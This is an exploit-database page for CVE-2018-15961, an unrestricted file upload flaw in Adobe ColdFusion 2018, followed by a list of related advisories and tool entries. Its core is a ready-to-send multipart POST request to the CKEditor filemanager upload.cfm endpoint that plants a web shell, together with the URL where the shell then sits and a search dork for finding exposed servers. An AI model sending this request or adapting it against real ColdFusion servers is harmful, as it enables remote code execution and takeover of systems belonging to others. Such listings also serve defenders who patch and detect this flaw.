Lucene search
Vahagn Vardanyan1337DAY-ID-31770HistoryDec 12, 2018 - 12:00 a.m.
Adobe ColdFusion 2018 - Arbitrary File Upload Vulnerability
2018-12-1200:00:00
Vahagn Vardanyan
0day.today
211
EPSS
0.975
Percentile
100.0%
Exploit for multiple platform in category web applications
# Exploit Title: Unrestricted file upload in Adobe ColdFusion 2018
# Google Dork: ext:cfm
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# CVE : CVE-2018-15961
# Comment: September 28, 2018: Updates for ColdFusion 2018 and ColdFusion
2016 have been elevated to Priority 1 due to a report that CVE-2018-15961
is now being actively exploited.
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data;
boundary=---------------------------24464570528145
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg
%shell code here%
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
shell
-----------------------------24464570528145--
```
a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
# 0day.today [2018-12-12] #Related
packetstorm
packetstorm
Adobe ColdFusion 2018 Shell Upload
2018-12-12 00:00:00
Adobe Coldfusion 11 CKEditor Arbitrary File Upload
2019-01-10 00:00:00
dsquare
dsquare
Adobe ColdFusion File Upload
2018-12-13 00:00:00
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Remote Code Execution (CVE-2018-15961)
2018-11-15 00:00:00
nessus
nessus
zdt
zdt
Adobe Coldfusion 11 CKEditor Arbitrary File Upload Exploit
2019-01-10 00:00:00
cvelist
cvelist
CVE-2018-15961
2018-09-25 13:00:00
cve
cve
CVE-2018-15961
2018-09-25 13:29:01
exploitdb
exploitdb
Adobe ColdFusion 2018 - Arbitrary File Upload
2018-12-11 00:00:00
prion
prion
Unrestricted file upload
2018-09-25 13:29:00
nuclei
nuclei
Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
2021-11-10 17:46:34
metasploit
metasploit
Adobe ColdFusion CKEditor unrestricted file upload
2019-01-06 03:55:20
malwarebytes
malwarebytes
A week in security (November 5 – 11)
2018-11-12 17:17:57
threatpost
threatpost
Recently-Patched Adobe ColdFusion Flaw Exploited By APT
2018-11-09 21:16:23
Adobe Patches Six Critical Flaws in ColdFusion
2018-09-11 14:52:38
cisa_kev
cisa_kev
Adobe ColdFusion Unrestricted File Upload Vulnerability
2021-11-03 00:00:00
nvd
nvd
CVE-2018-15961
2018-09-25 13:29:01
attackerkb
attackerkb
CVE-2018-15961
2018-09-25 00:00:00
Adobe ColdFusion CKEditor file upload
2018-09-25 00:00:00
exploitpack
exploitpack
Adobe ColdFusion 2018 - Arbitrary File Upload
2018-12-11 00:00:00
adobe
adobe
APSB18-33 Security updates available for ColdFusion
2018-09-11 00:00:00
openvas
openvas
Adobe ColdFusion Multiple Vulnerabilities (APSB18-33)
2018-09-12 00:00:00
thn
thn
Adobe Issues ColdFusion Software Update for 6 Critical Vulnerabilities
2018-09-11 17:25:00
qualysblog
qualysblog
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
2020-12-10 00:48:29
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00